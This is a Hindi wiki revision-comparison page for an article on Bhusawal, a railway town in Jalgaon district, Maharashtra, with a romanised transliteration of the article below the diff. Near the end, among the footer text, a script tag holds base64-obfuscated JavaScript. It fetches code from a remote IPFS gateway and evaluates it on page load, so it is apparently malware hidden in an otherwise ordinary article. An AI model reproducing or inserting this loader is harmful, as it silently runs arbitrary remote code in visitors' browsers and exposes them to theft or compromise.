Difference between revisions of "भुसावल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कारखाना" to "कारख़ाना")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
{{tocright}}
 
{{tocright}}
भुसावल शहर [[जलगांव ज़िला]], उत्तरी [[महाराष्ट्र]] राज्य, पश्चिमी [[भारत]] में है। यह [[सतपुडा पर्वतश्रेणी]] और [[दक्कन पठार]] की अजंता पहाड़ियों के मध्य [[ताप्ती नदी]] के तट पर स्थित है। [[मुंबई]] (भूतपूर्व बंबई)-[[कोलकाता]] (भूतपूर्व कलकत्ता) और मुंबई-[[दिल्ली]] मार्गों पर स्थित यह शहर एक प्रमुख रेलवे जंक्शन है। एक विशाल रेल-इंजन कार्यशाला वाला भुसावल मूलत : एक रेलवे नगर है।
+
भुसावल शहर [[जलगांव ज़िला]], उत्तरी [[महाराष्ट्र]] राज्य, पश्चिमी [[भारत]] में है। यह [[सतपुड़ा पर्वतश्रेणी]] और [[दक्कन पठार]] की अजंता पहाड़ियों के मध्य [[ताप्ती नदी]] के तट पर स्थित है। [[मुंबई]] (भूतपूर्व बंबई)-[[कोलकाता]] (भूतपूर्व कलकत्ता) और मुंबई-[[दिल्ली]] मार्गों पर स्थित यह शहर एक प्रमुख रेलवे जंक्शन है। एक विशाल रेल-इंजन कार्यशाला वाला भुसावल मूलत : एक रेलवे नगर है।
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
यहाँ आसपास के कपास उत्पादन क्षेत्रों का एक प्रमुख केंद है। भुसावल के इलाक़े मे उत्पादित केलों, बाजरा और मूंगफली का व्यापार होता है। यहाँ एक बड़ा तेलशोधक कारखाना है।  
+
भुसावल आसपास के कपास उत्पादन क्षेत्रों का एक प्रमुख केंद है। भुसावल के इलाक़े में उत्पादित [[केला|केले]], बाजरा और [[मूँगफली]] का व्यापार होता है। भुसावल एक बड़ा तेलशोधक कारख़ाना है।  
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
भुसावल में एस. जी. बी कॉलेज ऑफ़ इंजीनियरिंग ऐंड टेक्नोलॉजी, पी.ओ. नाहटा कला, विज्ञान और वाणिज्य महाविद्यालय और डी.एल, माध्यमिक विद्यालय स्थित है।  
 
भुसावल में एस. जी. बी कॉलेज ऑफ़ इंजीनियरिंग ऐंड टेक्नोलॉजी, पी.ओ. नाहटा कला, विज्ञान और वाणिज्य महाविद्यालय और डी.एल, माध्यमिक विद्यालय स्थित है।  
 
==जनसंख्या==
 
==जनसंख्या==
2001 की जनगणना के अनुसार भुसावल शहर की कुल जनसंख्या 1,72,366 है।
+
[[2001]] की जनगणना के अनुसार भुसावल शहर की कुल जनसंख्या 1,72,366 है।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 15: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{महाराष्ट्र के पर्यटन स्थल}}
 +
{{महाराष्ट्र के नगर}}
 
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र के नगर]][[Category:भारत के नगर]]
 
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र के नगर]][[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:14, 27 August 2011

bhusaval shahar jalagaanv zila, uttari maharashtr rajy, pashchimi bharat mean hai. yah satapu da parvatashreni aur dakkan pathar ki ajanta paha diyoan ke madhy tapti nadi ke tat par sthit hai. muanbee (bhootapoorv banbee)-kolakata (bhootapoorv kalakatta) aur muanbee-dilli margoan par sthit yah shahar ek pramukh relave jankshan hai. ek vishal rel-ianjan karyashala vala bhusaval moolat : ek relave nagar hai.

udyog aur vyapar

bhusaval asapas ke kapas utpadan kshetroan ka ek pramukh keand hai. bhusaval ke ilaqe mean utpadit kele, bajara aur mooangaphali ka vyapar hota hai. bhusaval ek b da telashodhak karakhana hai.

shikshan sansthan

bhusaval mean es. ji. bi k aaulej aauf ianjiniyariang aiand teknol aauji, pi.o. nahata kala, vijnan aur vanijy mahavidyalay aur di.el, madhyamik vidyalay sthit hai.

janasankhya

2001 ki janaganana ke anusar bhusaval shahar ki kul janasankhya 1,72,366 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh